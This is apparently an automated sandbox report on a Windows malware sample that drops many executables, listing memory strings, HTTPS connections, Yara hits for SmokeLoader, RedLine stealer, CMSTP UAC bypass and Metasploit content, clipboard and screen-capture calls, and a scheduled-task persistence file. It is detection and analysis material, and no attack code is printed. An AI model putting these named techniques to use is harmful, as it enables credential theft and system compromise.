00000019.00000003.2981726315.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2981885881.0000000000AED000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2981790072.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3131828947.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3119147039.000000000130C000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3119019447.000000000135E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000CA6000.00000004.00000020.00020000.00000000.sdmp, 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2875119965.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2874970623.00000000017D9000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000002.2876054094.0000000001753000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000002.2876515445.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2875039832.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2981726315.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2981790072.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3119634752.000000000135C000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3119147039.000000000132B000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3119147039.000000000130C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: rnHV2EM9rK6P.exe, 00000021.00000003.3254135207.0000000002091000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.exe, 00000021.00000002.3402157127.0000000002091000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.exe, 00000021.00000003.3254022092.0000000002320000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.tmp, 00000022.00000002.3401325373.000000000059F000.00000004.00000020.00020000.00000000.sdmp, rnHV2EM9rK6P.tmp, 00000022.00000002.3403877696.0000000001FE8000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.tmp, 00000022.00000003.3260555569.0000000001FE8000.00000004.00001000.00020000.00000000.sdmp, rnHV2EM9rK6P.tmp, 00000022.00000003.3258877754.00000000030F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.easycutstudio.com/support.html
Source: cbf2b6294a.exe, 00000019.00000003.2994536599.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994423825.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994343064.000000000561B000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133246728.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133387973.00000000059BA000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133599716.00000000059BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: cbf2b6294a.exe, 00000019.00000003.2994536599.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994423825.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994343064.000000000561B000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133246728.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133387973.00000000059BA000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133599716.00000000059BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: b4fe2af6b4.exe, 00000016.00000003.2847743530.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptch55
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: KbSwZup.exe, 0000001C.00000003.3171054247.0000000005CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: KbSwZup.exe, 0000001C.00000003.3171054247.0000000005CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: cbf2b6294a.exe, 00000019.00000003.3029227122.000000000570C000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3171054247.0000000005CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: KbSwZup.exe, 0000001C.00000003.3171054247.0000000005CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: cbf2b6294a.exe, 00000019.00000003.3029227122.000000000570C000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3171054247.0000000005CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: cbf2b6294a.exe, 00000019.00000003.3029227122.000000000570C000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3171054247.0000000005CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49959 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50001 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.104:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.104:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.104:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.104:443 -> 192.168.2.5:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.104:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50030 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50038 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50045 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.64:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50072 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1078003001\PqodvBZ.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\PqodvBZ[1].exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe

Code function: 10_2_0043B800 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

10_2_0043B800

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe

Code function: 10_2_0043B800 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

10_2_0043B800

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe

Code function: 10_2_0043B9F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

10_2_0043B9F0

System Summary

Malicious sample detected (through community Yara rule)

Source: 31.2.ViGgA8C.exe.e10000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 31.2.ViGgA8C.exe.e10000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 31.2.ViGgA8C.exe.e10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 24.2.976cb97ff6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001E.00000002.3396511396.000000000ECBE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001B.00000003.3145250358.000000000E0BE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001E.00000003.3280018996.000000000ECBE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001B.00000002.3197687317.000000000E0BE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000D.00000003.3068524352.000000000A810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001B.00000002.3197107411.000000000DFD8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0000001E.00000002.3396257355.000000000EB80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001B.00000003.3145250358.000000000E02E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001B.00000002.3197687317.000000000E02E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001E.00000002.3396257355.000000000EC2E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000D.00000002.3110324959.000000000A810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: ViGgA8C.exe PID: 6044, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

PE file contains section with special chars

Source: 1w5RpHuliE.exe	Static PE information: section name:
Source: 1w5RpHuliE.exe	Static PE information: section name: .idata
Source: 1w5RpHuliE.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: KbSwZup.exe.6.dr	Static PE information: section name:
Source: KbSwZup.exe.6.dr	Static PE information: section name: .idata
Source: KbSwZup.exe.6.dr	Static PE information: section name:
Source: random[3].exe.6.dr	Static PE information: section name:
Source: random[3].exe.6.dr	Static PE information: section name: .idata
Source: random[3].exe.6.dr	Static PE information: section name:
Source: 6761aae677.exe.6.dr	Static PE information: section name:
Source: 6761aae677.exe.6.dr	Static PE information: section name: .idata
Source: 6761aae677.exe.6.dr	Static PE information: section name:
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name:
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name: .idata
Source: ViGgA8C[1].exe.6.dr	Static PE information: section name:
Source: ViGgA8C.exe.6.dr	Static PE information: section name:
Source: ViGgA8C.exe.6.dr	Static PE information: section name: .idata
Source: ViGgA8C.exe.6.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: .idata
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: Bjkm5hE.exe.6.dr	Static PE information: section name:
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: .idata
Source: Bjkm5hE.exe.6.dr	Static PE information: section name:
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name:
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name: .idata
Source: b4fe2af6b4.exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: 976cb97ff6.exe.6.dr	Static PE information: section name:
Source: 976cb97ff6.exe.6.dr	Static PE information: section name: .idata
Source: 976cb97ff6.exe.6.dr	Static PE information: section name:
Source: random[2].exe0.6.dr	Static PE information: section name:
Source: random[2].exe0.6.dr	Static PE information: section name: .idata
Source: random[2].exe0.6.dr	Static PE information: section name:
Source: cbf2b6294a.exe.6.dr	Static PE information: section name:
Source: cbf2b6294a.exe.6.dr	Static PE information: section name: .idata
Source: cbf2b6294a.exe.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: .idata
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: 14b550e5e3.exe.6.dr	Static PE information: section name:
Source: 14b550e5e3.exe.6.dr	Static PE information: section name: .idata
Source: 14b550e5e3.exe.6.dr	Static PE information: section name:
Source: KbSwZup[1].exe.6.dr	Static PE information: section name:
Source: KbSwZup[1].exe.6.dr	Static PE information: section name: .idata
Source: KbSwZup[1].exe.6.dr	Static PE information: section name:

PE file has a writeable .text section

Source: PqodvBZ[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PqodvBZ.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_006FE530	6_2_006FE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00738860	6_2_00738860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00737049	6_2_00737049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007378BB	6_2_007378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00732D10	6_2_00732D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_006F4DE0	6_2_006F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007331A8	6_2_007331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00727F36	6_2_00727F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_006F4B30	6_2_006F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0073779B	6_2_0073779B
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 10_2_0040C820	10_2_0040C820
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 10_2_0040B9C0	10_2_0040B9C0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 10_2_00440A50	10_2_00440A50
